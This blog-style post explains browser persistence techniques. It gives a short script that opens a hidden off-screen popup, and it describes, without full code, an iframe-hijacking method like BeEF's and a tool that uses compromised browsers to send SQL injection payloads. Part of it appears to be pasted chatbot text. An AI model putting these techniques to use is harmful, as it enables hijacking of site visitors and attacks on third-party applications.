🌟 Persistent Browser Techniques: Unleashing the Power within the Web 🌟
Hiii, here some persistent browser techniques. Prepare yourselves for a detailed exploration of two fascinating methods that will leave you in awe. So, tighten your virtual seatbelts, and let’s set sail!
Technique 1: The Simple Window Trick
function openSmallWindow(url) {
var width = 200;
var height = 200;
var left = 9999;
var top = 9999;
var features = `width=${width},height=${height},left=${left},top=${top}`;
window.open(url, '_blank', features);
}
document.addEventListener('click', function() {
var url = 'https://www.example.com';
openSmallWindow(url);
});
What sorcery is this, you ask? It’s as easy as pie! We’ve concocted a small but mighty function called openSmallWindow. Whenever you click on the document, this function opens a new window with a fixed width and height, directing it to the specified URL. A simple click, and a window emerges!
Technique 2: The Beastly Iframe Power
Link of POC:
Hold onto your hats, folks! This technique delves into the depths of complexity. The persistentIframe function takes center stage, hooking onto the clicks and form submissions within your browser. It creates hidden or fullscreen iframes, loads URLs or form actions, and performs various manipulations to transform your browser into a portal to another dimension. It’s like wielding dark magic within the web!
The code provided consists of several functions that work together to create a powerful mechanism for persistent browser actions. Let’s dive deeper into each component:
getHighestZindex(include_id):
This function iterates through all the elements in the document, querying their computed styles, and identifies the element with the highest z-index value.
It returns the highest z-index value or, if include_id is set to true, it returns an object containing both the highest z-index value and the corresponding element’s ID.createIframe(type, params, styles, onload):
This function dynamically creates an iframe element with customizable attributes, styles, and behavior.
The type parameter determines the type of iframe to create: “hidden”, “fullscreen”, or any other value for a regular iframe.
The params object allows you to specify additional attributes for the iframe, such as the source URL or form submission details.
The styles object contains CSS styles to be applied to the iframe.
If an onload function is provided, it will be called when the iframe’s content has finished loading.persistentIframe():
This function sets up event listeners for clicks on links (a tags), form submissions, and button clicks within the document.
When any of these events occur, the corresponding handleClick function is called.
Inside handleClick, the target element, its attributes (such as href, action, and method), and form data are extracted.
If the target element has an href attribute, a fullscreen iframe is created, loading the URL specified in the href attribute. The page’s title, scroll behavior, and overflow are also modified to enhance the persistence effect.
If the target element has an action attribute (e.g., a form submission), an iframe is created with the specified action URL, method, and form data (if applicable).
The resulting iframes are appended to the document’s body.
By combining these functions and event listeners, the code establishes a persistent iframe-based mechanism. It enables actions such as opening URLs, submitting forms, and capturing user interactions, all within iframes that seamlessly integrate with the existing web page.
This technique empowers you to create complex browser interactions, manipulate content, and maintain control over compromised browsers. However, be cautious and use such powers responsibly and ethically.
The Beast Behind: BEEF
Ah, the legend of BEEF! This technique aligns with the powers of the notorious Browser Exploitation Framework, also known as BEEF. Picture it as a treasure trove for web hackers, filled with powerful modules for all sorts of browser exploitation shenanigans.
BEEF’s persistence modules employ similar concepts to maintain control over compromised browsers. These modules take the technique we just explored and elevate it to a whole new level of complexity. With some improvements and tweaks, these modules can unlock extraordinary capabilities and provide endless possibilities within the realm of browser exploitation.
Limitations: Taming the Beasts
As with any extraordinary power, there are limitations to consider. Let’s explore the boundaries of these techniques:
🔒 Technique 1 Limitations:
Window blockers and popup blockers might interfere with the window creation process.
Modern browsers have become more vigilant about blocking popups, so users might have to allow popups for the technique to work.
It heavily relies on the user’s browser settings and behavior.
🔒 Technique 2 Limitations:
Cross-origin policies may prevent loading content from different domains into iframes.
Modern browsers have enhanced security measures that restrict iframes with certain attributes, such as sandboxing.
The technique may be detected by antivirus or security software, triggering alerts or blocking the execution.
Abusing request to use clients as your “hack-zombies” (audJSditor)
The next step after persistence would be to use the infected client for our own purposes:
Look at this proof of concept, let’s explain it above:
http://…
The code contains an array called ‘DB_TYPEPayloadsArray’ which stores various types of payloads for different database types like standard SQL, PostgreSQL, MySQL, NoSQL, SQLite, MongoDB, and Cassandra.
Each database type has three categories of payloads: ErrorBased, TimeBased, and BooleanBased. These payloads are commonly used in SQL injection attacks to exploit vulnerabilities in web applications. For example, the ErrorBased payloads use techniques like injecting SQL statements in input fields to cause errors and extract sensitive information from the database.
The code also includes a function called ‘checkPayload’ that takes in parameters like the URL of the target application, cookies, database type, and payload type. It uses a random user agent from a list of user agents for popular browsers like Chrome, Firefox, and Safari to make the requests look more legitimate.
The function sends HTTP requests to the target URL with the specified payload and checks the response for any potential vulnerabilities. It also includes a timeout of 5 seconds to avoid long delays in case the payload causes a time-based attack.
However, it’s important to note that this code is for educational purposes only and should not be used maliciously. It’s always best to obtain proper authorization before testing the security of any application. Also, keep in mind that this tool has limitations. It may not work against applications with strong security measures in place or when the target database is properly configured to prevent SQL injection attacks.
So, if you’re interested in testing the security of your web applications and want to explore SQL injection vulnerabilities, give AudJSditor a try! But remember to use it responsibly and ethically.”
I hope this provides a more detailed explanation of the JavaScript code and its similarities with SQLMAP, as well as the possible limitations you may encounter when using this tool. Let me know if there’s anything else I can help you with!
Conclusions: Sailing through the Web’s Persistence
Avast, fellow web adventurers! We’ve uncovered the secrets of persistence within the vast ocean of browsers. The simple window trick offers a quick and straightforward way to open small windows, while the beastly iframe power immerses us in a world of complexity and manipulation.
Remember, the power we’ve unveiled here carries great responsibility. While BEEF’s persistence modules may face obsolescence due to evolving security measures, with continuous improvement and clever adaptations, they can unleash astonishing possibilities.
Now, go forth and navigate the web with newfound knowledge! Tread carefully, respect boundaries, and always use your powers for good. Happy hacking, mates! ⚡️🌐⚔️